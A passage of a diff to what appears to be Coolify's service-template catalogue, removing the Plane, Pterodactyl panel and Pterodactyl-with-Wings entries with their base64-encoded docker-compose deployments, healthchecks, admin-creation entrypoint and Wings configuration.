AgICBSQUJCSVRNUV9ERUZBVUxUX1BBU1M6ICcke1NFUlZJQ0VfUEFTU1dPUkRfUkFCQklUTVE6LXBsYW5lfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9WSE9TVDogJyR7UkFCQklUTVFfVkhPU1Q6LXBsYW5lfScKICAgICAgUkFCQklUTVFfVkhPU1Q6ICcke1JBQkJJVE1RX1ZIT1NUOi1wbGFuZX0nCiAgICBkZXBlbmRzX29uOgogICAgICAtIHBsYW5lLWRiCiAgICAgIC0gcGxhbmUtcmVkaXMKICBwbGFuZS1kYjoKICAgIGltYWdlOiAncG9zdGdyZXM6MTUuNy1hbHBpbmUnCiAgICBjb21tYW5kOiAicG9zdGdyZXMgLWMgJ21heF9jb25uZWN0aW9ucz0xMDAwJyIKICAgIGVudmlyb25tZW50OgogICAgICBQR0hPU1Q6IHBsYW5lLWRiCiAgICAgIFBHREFUQUJBU0U6IHBsYW5lCiAgICAgIFBPU1RHUkVTX1VTRVI6ICRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgUE9TVEdSRVNfUEFTU1dPUkQ6ICRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIFBPU1RHUkVTX0RCOiBwbGFuZQogICAgICBQT1NUR1JFU19QT1JUOiA1NDMyCiAgICAgIFBHREFUQTogL3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhCiAgICB2b2x1bWVzOgogICAgICAtICdwZ2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHBsYW5lLXJlZGlzOgogICAgaW1hZ2U6ICd2YWxrZXkvdmFsa2V5OjcuMi41LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3JlZGlzZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtIHBpbmcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHBsYW5lLW1xOgogICAgaW1hZ2U6ICdyYWJiaXRtcTozLjEzLjYtbWFuYWdlbWVudC1hbHBpbmUnCiAgICByZXN0YXJ0OiBhbHdheXMKICAgIGVudmlyb25tZW50OgogICAgICBSQUJCSVRNUV9IT1NUOiBwbGFuZS1tcQogICAgICBSQUJCSVRNUV9QT1JUOiAnJHtSQUJCSVRNUV9QT1JUOi01NjcyfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9VU0VSOiAnJHtTRVJWSUNFX1VTRVJfUkFCQklUTVE6LXBsYW5lfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9QQVNTOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1ROi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfVkhPU1Q6ICcke1JBQkJJVE1RX1ZIT1NUOi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX1ZIT1NUOiAnJHtSQUJCSVRNUV9WSE9TVDotcGxhbmV9JwogICAgdm9sdW1lczoKICAgICAgLSAncmFiYml0bXFfZGF0YTovdmFyL2xpYi9yYWJiaXRtcScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAncmFiYml0bXEtZGlhZ25vc3RpY3MgLXEgcGluZycKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAzMHMKICAgICAgcmV0cmllczogMwogIHBsYW5lLW1pbmlvOgogICAgaW1hZ2U6ICdnaGNyLmlvL2Nvb2xsYWJzaW8vbWluaW86UkVMRUFTRS4yMDI1LTEwLTE1VDE3LTI5LTU1WicKICAgIGNvbW1hbmQ6ICdzZXJ2ZXIgL2V4cG9ydCAtLWNvbnNvbGUtYWRkcmVzcyAiOjkwOTAiJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIE1JTklPX1JPT1RfVVNFUjogJFNFUlZJQ0VfVVNFUl9NSU5JTwogICAgICBNSU5JT19ST09UX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9NSU5JTwogICAgdm9sdW1lczoKICAgICAgLSAndXBsb2FkczovZXhwb3J0JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIG1jCiAgICAgICAgLSByZWFkeQogICAgICAgIC0gbG9jYWwKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
-        "tags": [
-            "plane",
-            "project-management",
-            "tool",
-            "open",
-            "source",
-            "api",
-            "nextjs",
-            "redis",
-            "postgresql",
-            "django",
-            "pm"
-        ],
-        "category": "productivity",
-        "logo": "svgs/plane.svg",
-        "minversion": "0.0.0"
-    },
     "plex": {
         "documentation": "https://docs.linuxserver.io/images/docker-plex/?utm_source=coolify.io",
         "slogan": "Plex organizes video, music and photos from personal media libraries and streams them to smart TVs, streaming boxes and mobile devices.",
@@ -3858,38 +3837,6 @@
         "minversion": "0.0.0",
         "port": "9159"
     },
-    "pterodactyl-panel": {
-        "documentation": "https://pterodactyl.io/?utm_source=coolify.io",
-        "slogan": "Pterodactyl is a free, open-source game server management panel",
-        "compose": "c2VydmljZXM6CiAgbWFyaWFkYjoKICAgIGltYWdlOiAnbWFyaWFkYjoxMS44JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdoZWFsdGhjaGVjay5zaCAtLWNvbm5lY3QgLS1pbm5vZGJfaW5pdGlhbGl6ZWQgfHwgZXhpdCAxJwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIE1ZU1FMX1JPT1RfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfTVlTUUxST09UCiAgICAgIC0gTVlTUUxfREFUQUJBU0U9cHRlcm9kYWN0eWwtZGIKICAgICAgLSBNWVNRTF9VU0VSPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBNWVNRTF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgdm9sdW1lczoKICAgICAgLSAncHRlcm9kYWN0eWwtZGI6L3Zhci9saWIvbXlzcWwnCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOmFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncmVkaXMtY2xpIHBpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMKICBwdGVyb2RhY3R5bDoKICAgIGltYWdlOiAnZ2hjci5pby9wdGVyb2RhY3R5bC9wYW5lbDp2MS4xMi4wJwogICAgdm9sdW1lczoKICAgICAgLSAncGFuZWwtdmFyOi9hcHAvdmFyLycKICAgICAgLSAncGFuZWwtbmdpbng6L2V0Yy9uZ2lueC9odHRwLmQvJwogICAgICAtICdwYW5lbC1jZXJ0czovZXRjL2xldHNlbmNyeXB0LycKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vZXRjL2VudHJ5cG9pbnQuc2gKICAgICAgICB0YXJnZXQ6IC9lbnRyeXBvaW50LnNoCiAgICAgICAgbW9kZTogJzA3NTUnCiAgICAgICAgY29udGVudDogIiMhL2Jpbi9zaFxuc2V0IC1lXG5cbiBlY2hvIFwiU2V0dGluZyBsb2dzIHBlcm1pc3Npb25zLi4uXCJcbiBjaG93biAtUiBuZ2lueDogL2FwcC9zdG9yYWdlL2xvZ3MvXG5cbiBVU0VSX0VYSVNUUz0kKHBocCBhcnRpc2FuIHRpbmtlciAtLW5vLWFuc2kgLS1leGVjdXRlPSdlY2hvIFxcUHRlcm9kYWN0eWxcXE1vZGVsc1xcVXNlcjo6d2hlcmUoXCJlbWFpbFwiLCBcIidcIiRBRE1JTl9FTUFJTFwiJ1wiKS0+ZXhpc3RzKCkgPyBcIjFcIiA6IFwiMFwiOycpXG5cbiBpZiBbIFwiJFVTRVJfRVhJU1RTXCIgPSBcIjBcIiBdOyB0aGVuXG4gICBlY2hvIFwiQWRtaW4gVXNlciBkb2VzIG5vdCBleGlzdCwgY3JlYXRpbmcgdXNlciBub3cuXCJcbiAgIHBocCBhcnRpc2FuIHA6dXNlcjptYWtlIC0tbm8taW50ZXJhY3Rpb24gXFxcbiAgICAgLS1hZG1pbj0xIFxcXG4gICAgIC0tZW1haWw9XCIkQURNSU5fRU1BSUxcIiBcXFxuICAgICAtLXVzZXJuYW1lPVwiJEFETUlOX1VTRVJOQU1FXCIgXFxcbiAgICAgLS1uYW1lLWZpcnN0PVwiJEFETUlOX0ZJUlNUTkFNRVwiIFxcXG4gICAgIC0tbmFtZS1sYXN0PVwiJEFETUlOX0xBU1ROQU1FXCIgXFxcbiAgICAgLS1wYXNzd29yZD1cIiRBRE1JTl9QQVNTV09SRFwiXG4gICBlY2hvIFwiQWRtaW4gdXNlciBjcmVhdGVkIHN1Y2Nlc3NmdWxseSFcIlxuIGVsc2VcbiAgIGVjaG8gXCJBZG1pbiBVc2VyIGFscmVhZHkgZXhpc3RzLCBza2lwcGluZyBjcmVhdGlvbi5cIlxuIGZpXG5cbiBleGVjIHN1cGVydmlzb3JkIC0tbm9kYWVtb25cbiIKICAgIGNvbW1hbmQ6CiAgICAgIC0gL2VudHJ5cG9pbnQuc2gKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtc2YgaHR0cDovL2xvY2FsaG9zdDo4MCB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogMXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSEFTSElEU19TQUxUPSRTRVJWSUNFX1BBU1NXT1JEX0hBU0hJRFMKICAgICAgLSBIQVNISURTX0xFTkdUSD04CiAgICAgIC0gU0VSVklDRV9VUkxfUFRFUk9EQUNUWUxfODAKICAgICAgLSAnQURNSU5fRU1BSUw9JHtBRE1JTl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdBRE1JTl9VU0VSTkFNRT0ke1NFUlZJQ0VfVVNFUl9BRE1JTn0nCiAgICAgIC0gJ0FETUlOX0ZJUlNUTkFNRT0ke0FETUlOX0ZJUlNUTkFNRTotQWRtaW59JwogICAgICAtICdBRE1JTl9MQVNUTkFNRT0ke0FETUlOX0xBU1ROQU1FOi1Vc2VyfScKICAgICAgLSAnQURNSU5fUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0FETUlOfScKICAgICAgLSAnUFRFUk9EQUNUWUxfSFRUUFM9JHtQVEVST0RBQ1RZTF9IVFRQUzotZmFsc2V9JwogICAgICAtIEFQUF9FTlY9cHJvZHVjdGlvbgogICAgICAtIEFQUF9FTlZJUk9OTUVOVF9PTkxZPWZhbHNlCiAgICAgIC0gQVBQX1VSTD0kU0VSVklDRV9VUkxfUFRFUk9EQUNUWUwKICAgICAgLSAnQVBQX1RJTUVaT05FPSR7VElNRVpPTkU6LVVUQ30nCiAgICAgIC0gJ0FQUF9TRVJWSUNFX0FVVEhPUj0ke0FQUF9TRVJWSUNFX0FVVEhPUjotYXV0aG9yQGV4YW1wbGUuY29tfScKICAgICAgLSAnTE9HX0xFVkVMPSR7TE9HX0xFVkVMOi1kZWJ1Z30nCiAgICAgIC0gQ0FDSEVfRFJJVkVSPXJlZGlzCiAgICAgIC0gU0VTU0lPTl9EUklWRVI9cmVkaXMKICAgICAgLSBRVUVVRV9EUklWRVI9cmVkaXMKICAgICAgLSBSRURJU19IT1NUPXJlZGlzCiAgICAgIC0gREJfREFUQUJBU0U9cHRlcm9kYWN0eWwtZGIKICAgICAgLSBEQl9VU0VSTkFNRT0kU0VSVklDRV9VU0VSX01ZU1FMCiAgICAgIC0gREJfSE9TVD1tYXJpYWRiCiAgICAgIC0gREJfUE9SVD0zMzA2CiAgICAgIC0gREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfTVlTUUwKICAgICAgLSBNQUlMX0ZST009JE1BSUxfRlJPTQogICAgICAtIE1BSUxfRFJJVkVSPSRNQUlMX0RSSVZFUgogICAgICAtIE1BSUxfSE9TVD0kTUFJTF9IT1NUCiAgICAgIC0gTUFJTF9QT1JUPSRNQUlMX1BPUlQKICAgICAgLSBNQUlMX1VTRVJOQU1FPSRNQUlMX1VTRVJOQU1FCiAgICAgIC0gTUFJTF9QQVNTV09SRD0kTUFJTF9QQVNTV09SRAogICAgICAtIE1BSUxfRU5DUllQVElPTj0kTUFJTF9FTkNSWVBUSU9OCg==",
-        "tags": [
-            "game",
-            "game server",
-            "management",
-            "panel",
-            "minecraft"
-        ],
-        "category": "media",
-        "logo": "svgs/pterodactyl.png",
-        "minversion": "0.0.0",
-        "port": "80"
-    },
-    "pterodactyl-with-wings": {
-        "documentation": "https://pterodactyl.io/?utm_source=coolify.io",
-        "slogan": "Pterodactyl is a free, open-source game server management panel",
-        "compose": "c2VydmljZXM6CiAgbWFyaWFkYjoKICAgIGltYWdlOiAnbWFyaWFkYjoxMS44JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdoZWFsdGhjaGVjay5zaCAtLWNvbm5lY3QgLS1pbm5vZGJfaW5pdGlhbGl6ZWQgfHwgZXhpdCAxJwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIE1ZU1FMX1JPT1RfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfTVlTUUxST09UCiAgICAgIC0gTVlTUUxfREFUQUJBU0U9cHRlcm9kYWN0eWwtZGIKICAgICAgLSBNWVNRTF9VU0VSPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBNWVNRTF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgdm9sdW1lczoKICAgICAgLSAncHRlcm9kYWN0eWwtZGI6L3Zhci9saWIvbXlzcWwnCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOmFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncmVkaXMtY2xpIHBpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMKICBwdGVyb2RhY3R5bDoKICAgIGltYWdlOiAnZ2hjci5pby9wdGVyb2RhY3R5bC9wYW5lbDp2MS4xMi4wJwogICAgdm9sdW1lczoKICAgICAgLSAncGFuZWwtdmFyOi9hcHAvdmFyLycKICAgICAgLSAncGFuZWwtbmdpbng6L2V0Yy9uZ2lueC9odHRwLmQvJwogICAgICAtICdwYW5lbC1jZXJ0czovZXRjL2xldHNlbmNyeXB0LycKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vZXRjL2VudHJ5cG9pbnQuc2gKICAgICAgICB0YXJnZXQ6IC9lbnRyeXBvaW50LnNoCiAgICAgICAgbW9kZTogJzA3NTUnCiAgICAgICAgY29udGVudDogIiMhL2Jpbi9zaFxuc2V0IC1lXG5cbiBlY2hvIFwiU2V0dGluZyBsb2dzIHBlcm1pc3Npb25zLi4uXCJcbiBjaG93biAtUiBuZ2lueDogL2FwcC9zdG9yYWdlL2xvZ3MvXG5cbiBVU0VSX0VYSVNUUz0kKHBocCBhcnRpc2FuIHRpbmtlciAtLW5vLWFuc2kgLS1leGVjdXRlPSdlY2hvIFxcUHRlcm9kYWN0eWxcXE1vZGVsc1xcVXNlcjo6d2hlcmUoXCJlbWFpbFwiLCBcIidcIiRBRE1JTl9FTUFJTFwiJ1wiKS0+ZXhpc3RzKCkgPyBcIjFcIiA6IFwiMFwiOycpXG5cbiBpZiBbIFwiJFVTRVJfRVhJU1RTXCIgPSBcIjBcIiBdOyB0aGVuXG4gICBlY2hvIFwiQWRtaW4gVXNlciBkb2VzIG5vdCBleGlzdCwgY3JlYXRpbmcgdXNlciBub3cuXCJcbiAgIHBocCBhcnRpc2FuIHA6dXNlcjptYWtlIC0tbm8taW50ZXJhY3Rpb24gXFxcbiAgICAgLS1hZG1pbj0xIFxcXG4gICAgIC0tZW1haWw9XCIkQURNSU5fRU1BSUxcIiBcXFxuICAgICAtLXVzZXJuYW1lPVwiJEFETUlOX1VTRVJOQU1FXCIgXFxcbiAgICAgLS1uYW1lLWZpcnN0PVwiJEFETUlOX0ZJUlNUTkFNRVwiIFxcXG4gICAgIC0tbmFtZS1sYXN0PVwiJEFETUlOX0xBU1ROQU1FXCIgXFxcbiAgICAgLS1wYXNzd29yZD1cIiRBRE1JTl9QQVNTV09SRFwiXG4gICBlY2hvIFwiQWRtaW4gdXNlciBjcmVhdGVkIHN1Y2Nlc3NmdWxseSFcIlxuIGVsc2VcbiAgIGVjaG8gXCJBZG1pbiBVc2VyIGFscmVhZHkgZXhpc3RzLCBza2lwcGluZyBjcmVhdGlvbi5cIlxuIGZpXG5cbiBleGVjIHN1cGVydmlzb3JkIC0tbm9kYWVtb25cbiIKICAgIGNvbW1hbmQ6CiAgICAgIC0gL2VudHJ5cG9pbnQuc2gKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtc2YgaHR0cDovL2xvY2FsaG9zdDo4MCB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogMXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSEFTSElEU19TQUxUPSRTRVJWSUNFX1BBU1NXT1JEX0hBU0hJRFMKICAgICAgLSBIQVNISURTX0xFTkdUSD04CiAgICAgIC0gU0VSVklDRV9VUkxfUFRFUk9EQUNUWUxfODAKICAgICAgLSAnQURNSU5fRU1BSUw9JHtBRE1JTl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdBRE1JTl9VU0VSTkFNRT0ke1NFUlZJQ0VfVVNFUl9BRE1JTn0nCiAgICAgIC0gJ0FETUlOX0ZJUlNUTkFNRT0ke0FETUlOX0ZJUlNUTkFNRTotQWRtaW59JwogICAgICAtICdBRE1JTl9MQVNUTkFNRT0ke0FETUlOX0xBU1ROQU1FOi1Vc2VyfScKICAgICAgLSAnQURNSU5fUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0FETUlOfScKICAgICAgLSAnUFRFUk9EQUNUWUxfSFRUUFM9JHtQVEVST0RBQ1RZTF9IVFRQUzotZmFsc2V9JwogICAgICAtIEFQUF9FTlY9cHJvZHVjdGlvbgogICAgICAtIEFQUF9FTlZJUk9OTUVOVF9PTkxZPWZhbHNlCiAgICAgIC0gQVBQX1VSTD0kU0VSVklDRV9VUkxfUFRFUk9EQUNUWUwKICAgICAgLSAnQVBQX1RJTUVaT05FPSR7VElNRVpPTkU6LVVUQ30nCiAgICAgIC0gJ0FQUF9TRVJWSUNFX0FVVEhPUj0ke0FQUF9TRVJWSUNFX0FVVEhPUjotYXV0aG9yQGV4YW1wbGUuY29tfScKICAgICAgLSAnTE9HX0xFVkVMPSR7TE9HX0xFVkVMOi1kZWJ1Z30nCiAgICAgIC0gQ0FDSEVfRFJJVkVSPXJlZGlzCiAgICAgIC0gU0VTU0lPTl9EUklWRVI9cmVkaXMKICAgICAgLSBRVUVVRV9EUklWRVI9cmVkaXMKICAgICAgLSBSRURJU19IT1NUPXJlZGlzCiAgICAgIC0gREJfREFUQUJBU0U9cHRlcm9kYWN0eWwtZGIKICAgICAgLSBEQl9VU0VSTkFNRT0kU0VSVklDRV9VU0VSX01ZU1FMCiAgICAgIC0gREJfSE9TVD1tYXJpYWRiCiAgICAgIC0gREJfUE9SVD0zMzA2CiAgICAgIC0gREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfTVlTUUwKICAgICAgLSBNQUlMX0ZST009JE1BSUxfRlJPTQogICAgICAtIE1BSUxfRFJJVkVSPSRNQUlMX0RSSVZFUgogICAgICAtIE1BSUxfSE9TVD0kTUFJTF9IT1NUCiAgICAgIC0gTUFJTF9QT1JUPSRNQUlMX1BPUlQKICAgICAgLSBNQUlMX1VTRVJOQU1FPSRNQUlMX1VTRVJOQU1FCiAgICAgIC0gTUFJTF9QQVNTV09SRD0kTUFJTF9QQVNTV09SRAogICAgICAtIE1BSUxfRU5DUllQVElPTj0kTUFJTF9FTkNSWVBUSU9OCiAgd2luZ3M6CiAgICBpbWFnZTogJ2doY3IuaW8vcHRlcm9kYWN0eWwvd2luZ3M6djEuMTIuMScKICAgIHJlc3RhcnQ6IHVubGVzcy1zdG9wcGVkCiAgICBwb3J0czoKICAgICAgLSAnMjAyMjoyMDIyJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfV0lOR1NfODQ0MwogICAgICAtICdUWj0ke1RJTUVaT05FOi1VVEN9JwogICAgICAtIFdJTkdTX1VTRVJOQU1FPXB0ZXJvZGFjdHlsCiAgICB2b2x1bWVzOgogICAgICAtICcvdmFyL3J1bi9kb2NrZXIuc29jazovdmFyL3J1bi9kb2NrZXIuc29jaycKICAgICAgLSAnL3Zhci9saWIvZG9ja2VyL2NvbnRhaW5lcnMvOi92YXIvbGliL2RvY2tlci9jb250YWluZXJzLycKICAgICAgLSAnL3Zhci9saWIvcHRlcm9kYWN0eWwvOi92YXIvbGliL3B0ZXJvZGFjdHlsLycKICAgICAgLSAnL3RtcC9wdGVyb2RhY3R5bC86L3RtcC9wdGVyb2RhY3R5bC8nCiAgICAgIC0gJ3dpbmdzLWxvZ3M6L3Zhci9sb2cvcHRlcm9kYWN0eWwvJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9ldGMvY29uZmlnLnltbAogICAgICAgIHRhcmdldDogL2V0Yy9wdGVyb2RhY3R5bC9jb25maWcueW1sCiAgICAgICAgY29udGVudDogImRlYnVnOiBmYWxzZVxudXVpZDogUkVQTEFDRSBGUk9NIENPTkZJRyAjZXhhbXBsZTogYWJjOWFiYzgtYWJjNy1hYmM2LWFiYzUtYWJjNGFiYzNhYmMyXG50b2tlbl9pZDogUkVQTEFDRSBGUk9NIENPTkZJRyAjZXhhbXBsZTogYWJjMWFiYzJhYmMzYWJjNFxudG9rZW46IFJFUExBQ0UgRlJPTSBDT05GSUcgICNleGFtcGxlOiBhYmMxYWJjMmFiYzNhYmM0YWJjNWFiYzZhYmM3YWJjOGFiYzlhYmMxMGFiYzExYWJjMTJhYmMxM2FiYzE0YWJjMTVhYmMxNlxuYXBpOlxuICBob3N0OiAwLjAuMC4wXG4gIHBvcnQ6IDg0NDMgIyB1c2UgcG9ydCA0NDMgSU4gVEhFIFBBTkVMIGR1cmluZyBub2RlIHNldHVwXG4gIHNzbDpcbiAgICBlbmFibGVkOiBmYWxzZVxuICAgIGNlcnQ6IFJFUExBQ0UgRlJPTSBDT05GSUcgI2V4YW1wbGU6IC9ldGMvbGV0c2VuY3J5cHQvbGl2ZS93aW5ncy1hYmNhYmNhYmNhYmNhYmMuZXhhbXBsZS5jb20vZnVsbGNoYWluLnBlbVxuICAgIGtleTogUkVQTEFDRSBGUk9NIENPTkZJRyAjZXhhbXBsZTogL2V0Yy9sZXRzZW5jcnlwdC9saXZlL3dpbmdzLWFiY2FiY2FiY2FiY2FiYy5leGFtcGxlLmNvbS9wcml2a2V5LnBlbVxuICBkaXNhYmxlX3JlbW90ZV9kb3dubG9hZDogZmFsc2VcbiAgdXBsb2FkX2xpbWl0OiAxMDBcbiAgdHJ1c3RlZF9wcm94aWVzOiBbXVxuc3lzdGVtOlxuICByb290X2RpcmVjdG9yeTogL3Zhci9saWIvcHRlcm9kYWN0eWxcbiAgbG9nX2RpcmVjdG9yeTogL3Zhci9sb2cvcHRlcm9kYWN0eWxcbiAgZGF0YTogL3Zhci9saWIvcHRlcm9kYWN0eWwvdm9sdW1lc1xuICBhcmNoaXZlX2RpcmVjdG9yeTogL3Zhci9saWIvcHRlcm9kYWN0eWwvYXJjaGl2ZXNcbiAgYmFja3VwX2RpcmVjdG9yeTogL3Zhci9saWIvcHRlcm9kYWN0eWwvYmFja3Vwc1xuICB0bXBfZGlyZWN0b3J5OiAvdG1wL3B0ZXJvZGFjdHlsXG4gIHVzZXJuYW1lOiBwdGVyb2RhY3R5bFxuICB0aW1lem9uZTogVVRDXG4gIHVzZXI6XG4gICAgcm9vdGxlc3M6XG4gICAgICBlbmFibGVkOiBmYWxzZVxuICAgICAgY29udGFpbmVyX3VpZDogMFxuICAgICAgY29udGFpbmVyX2dpZDogMFxuICAgIHVpZDogOTg4XG4gICAgZ2lkOiA5ODhcbiAgZGlza19jaGVja19pbnRlcnZhbDogMTUwXG4gIGFjdGl2aXR5X3NlbmRfaW50ZXJ2YWw6IDYwXG4gIGFjdGl2aXR5X3NlbmRfY291bnQ6IDEwMFxuICBjaGVja19wZXJtaXNzaW9uc19vbl9ib290OiB0cnVlXG4gIGVuYWJsZV9sb2dfcm90YXRlOiB0cnVlXG4gIHdlYnNvY2tldF9sb2dfY291bnQ6IDE1MFxuICBzZnRwOlxuICAgIGJpbmRfYWRkcmVzczogMC4wLjAuMFxuICAgIGJpbmRfcG9ydDogMjAyMlxuICAgIHJlYWRfb25seTogZmFsc2VcbiAgY3Jhc2hfZGV0ZWN0aW9uOlxuICAgIGVuYWJsZWQ6IHRydWVcbiAgICBkZXRlY3RfY2xlYW5fZXhpdF9hc19jcmFzaDogdHJ1ZVxuICAgIHRpbWVvdXQ6IDYwXG4gIGJhY2t1cHM6XG4gICAgd3JpdGVfbGltaXQ6IDBcbiAgICBjb21wcmVzc2lvbl9sZXZlbDogYmVzdF9zcGVlZFxuICB0cmFuc2ZlcnM6XG4gICAgZG93bmxvYWRfbGltaXQ6IDBcbiAgb3BlbmF0X21vZGU6IGF1dG9cbmRvY2tlcjpcbiAgbmV0d29yazpcbiAgICBpbnRlcmZhY2U6IDE3Mi4yOC4wLjFcbiAgICBkbnM6XG4gICAgICAtIDEuMS4xLjFcbiAgICAgIC0gMS4wLjAuMVxuICAgIG5hbWU6IHB0ZXJvZGFjdHlsX253XG4gICAgaXNwbjogZmFsc2VcbiAgICBkcml2ZXI6IGJyaWRnZVxuICAgIG5ldHdvcmtfbW9kZTogcHRlcm9kYWN0eWxfbndcbiAgICBpc19pbnRlcm5hbDogZmFsc2VcbiAgICBlbmFibGVfaWNjOiB0cnVlXG4gICAgbmV0d29ya19tdHU6IDE1MDBcbiAgICBpbnRlcmZhY2VzOlxuICAgICAgdjQ6XG4gICAgICAgIHN1Ym5ldDogMTcyLjI4LjAuMC8xNlxuICAgICAgICBnYXRld2F5OiAxNzIuMjguMC4xXG4gICAgICB2NjpcbiAgICAgICAgc3VibmV0OiBmZGJhOjE3Yzg6NmM5NDo6LzY0XG4gICAgICAgIGdhdGV3YXk6IGZkYmE6MTdjODo2Yzk0OjoxMDExXG4gIGRvbWFpbm5hbWU6IFwiXCJcbiAgcmVnaXN0cmllczoge31cbiAgdG1wZnNfc2l6ZTogMTAwXG4gIGNvbnRhaW5lcl9waWRfbGltaXQ6IDUxMlxuICBpbnN0YWxsZXJfbGltaXRzOlxuICAgIG1lbW9yeTogMTAyNFxuICAgIGNwdTogMTAwXG4gIG92ZXJoZWFkOlxuICAgIG92ZXJyaWRlOiBmYWxzZVxuICAgIGRlZmF1bHRfbXVsdGlwbGllcjogMS4wNVxuICAgIG11bHRpcGxpZXJzOiB7fVxuICB1c2VfcGVyZm9ybWFudF9pbnNwZWN0OiB0cnVlXG4gIHVzZXJuc19tb2RlOiBcIlwiXG4gIGxvZ19jb25maWc6XG4gICAgdHlwZTogbG9jYWxcbiAgICBjb25maWc6XG4gICAgICBjb21wcmVzczogXCJmYWxzZVwiXG4gICAgICBtYXgtZmlsZTogXCIxXCJcbiAgICAgIG1heC1zaXplOiA1bVxuICAgICAgbW9kZTogbm9uLWJsb2NraW5nXG50aHJvdHRsZXM6XG4gIGVuYWJsZWQ6IHRydWVcbiAgbGluZXM6IDIwMDBcbiAgbGluZV9yZXNldF9pbnRlcnZhbDogMTAwXG5yZW1vdGU6IGh0dHA6Ly9wdGVyb2RhY3R5bDo4MFxucmVtb3RlX3F1ZXJ5OlxuICB0aW1lb3V0OiAzMFxuICBib290X3NlcnZlcnNfcGVyX3BhZ2U6IDUwXG5hbGxvd2VkX21vdW50czogW11cb